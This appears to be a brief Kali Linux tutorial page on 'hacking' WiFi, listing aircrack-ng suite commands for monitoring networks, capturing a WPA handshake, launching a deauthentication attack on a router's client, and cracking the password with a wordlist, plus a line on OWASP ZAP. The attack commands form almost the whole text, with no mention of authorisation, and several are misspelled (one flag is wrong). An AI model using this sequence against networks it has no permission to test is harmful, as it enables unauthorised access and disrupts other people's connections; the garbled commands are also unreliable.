The Basics of Kali linux (tutorial) – “Hacking” WiFi

The Basics of Kali linux (tutorial) – Part 2

Hack WiFi

airodump-ng wlan0

Capture handshacke:

airodump-ng wlan0 --bssid [mac Router] --cannel [channel Router] --write [location of cap file]

launch dehauther attack:

aireplay-ng -0 2 -a [mac Router] -c [mac Client] wlan0
  • Wait til wpa handshake shows in airodump window

Wordlist:

aircrack-ng -a2 -b [Router mac] -w [path to wordlist] [path to cap file]

Start and Stop network manager

systemctl start NetworkManager
systemctl stop NetworkManager

OWASP ZAP

Search for vulnerabilities in Websites

Shopping Cart